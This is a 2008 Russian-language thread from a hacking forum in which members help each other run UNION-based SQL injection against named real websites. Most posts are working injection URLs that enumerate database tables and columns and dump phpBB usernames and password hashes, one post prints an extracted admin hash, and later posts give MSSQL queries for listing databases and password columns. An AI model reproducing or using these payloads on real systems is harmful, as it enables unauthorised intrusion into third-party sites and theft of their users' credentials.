ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.05.2008, 22:10
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
 
Ответить с цитированием

  #2  
Старый 10.05.2008, 22:25
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Цитата:
Сообщение от diznt  
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,concat(username,0x3a,user_passwor d,0x3a,user_icq),3,4,5,6,7,8,9+from+phpbb_users+li mit+1,1/*

юзеры форума. Если на сайте есть форум, значит можно попытать залезть а таблицу его юзеров. Для пхпбб эта таблица как правило имеет название phpbb_users.

А вобще используй запрос типа такого http://www.site.ru/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name='passwor d'/*

Ты получаешь все таблицы, где есть колумн password. Можно вместо ='password' использовать функцию char()
 
Ответить с цитированием

мде..
  #3  
Старый 10.05.2008, 22:26
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами: 10025299

Репутация: 412
По умолчанию мде..

Цитата:
Сообщение от diznt  
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
Напиши скрипт(например на пхп)который будит будит подставлять значения лимита за тебя и собирать результат в тхт (где-то видел такой,помоему на грабберз.ком )
ЗЫ:Первые 17 значений - системные таблы!

Последний раз редактировалось S00pY; 10.05.2008 в 22:28..
 
Ответить с цитированием

  #4  
Старый 10.05.2008, 02:27
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/*

Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли((

http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/*

вот колонки phpbb

http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/*

Подскажите если не трудно
 
Ответить с цитированием

  #5  
Старый 10.05.2008, 05:33
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

diznt
не трудно..)

Цитата:
http://r-est.biz/?r=nj&n=-http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,table_schema+from+Information_schema.tables +where+table_name=%200x70687062625f7573657273+limi t+0,1/*
Цитата:
http://r-est.biz/?r=nj&n=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,concat(user_id,0x3a,usern ame,0x3a,user_password),null,null,null,null,null+f rom+restbi_bb.phpbb_users/*
admin;e816c860394f9fb51eed8d902a569e5d

Последний раз редактировалось sabe; 10.05.2008 в 06:34..
 
Ответить с цитированием

  #6  
Старый 10.05.2008, 12:02
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

точно там же concat)) блогадарю
 
Ответить с цитированием

  #7  
Старый 10.05.2008, 22:50
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

2 diznt ...ves' kaif lomae6.... uznavat' tables i columns v udovol'stvie.ili ti postavil na promishlennii ma6tab vzlomi 4erez sql.Kud anarod katitsea )) nikakoi romantiki uje...vse na avtomatiku prutsea..skoro v detskom sadike deti budut progoi ustanovlenoi v tetris serveri lomat' )) uda4i vam vsem v va6em nelegkom trude....
 
Ответить с цитированием

  #8  
Старый 11.05.2008, 08:15
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

знаю что нет но всётаки решил спрсить.... в mssql иньекции никак не выдернуить данные из другой бд?
 
Ответить с цитированием

  #9  
Старый 11.05.2008, 09:09
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

xcedz
откуда в mssql - load_file() взялся?

Цитата:
в mssql иньекции никак не выдернуить данные из другой бд?
Что ты подразумеваешь под другой БД?

Цитата:
select ColumnName from DBname.TableName ???
имена бд на сервере можно так посматреть:
Цитата:
Select schema_name from information_schema.schemata
если ты конечно про это...

Последний раз редактировалось aka PSIH; 11.05.2008 в 09:15..
 
Ответить с цитированием

  #10  
Старый 11.05.2008, 09:14
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Цитата:
Сообщение от aka PSIH  
xcedz
откуда в mssql - load_file() взялся?
блин не внимательно посмотрел.
==
а можно так:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...


http://msdn.microsoft.com/en-us/library/bb545450.aspx
тогда для текущей базы:
----------------------------------------
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --

h==p://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

Последний раз редактировалось xcedz; 11.05.2008 в 09:37..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.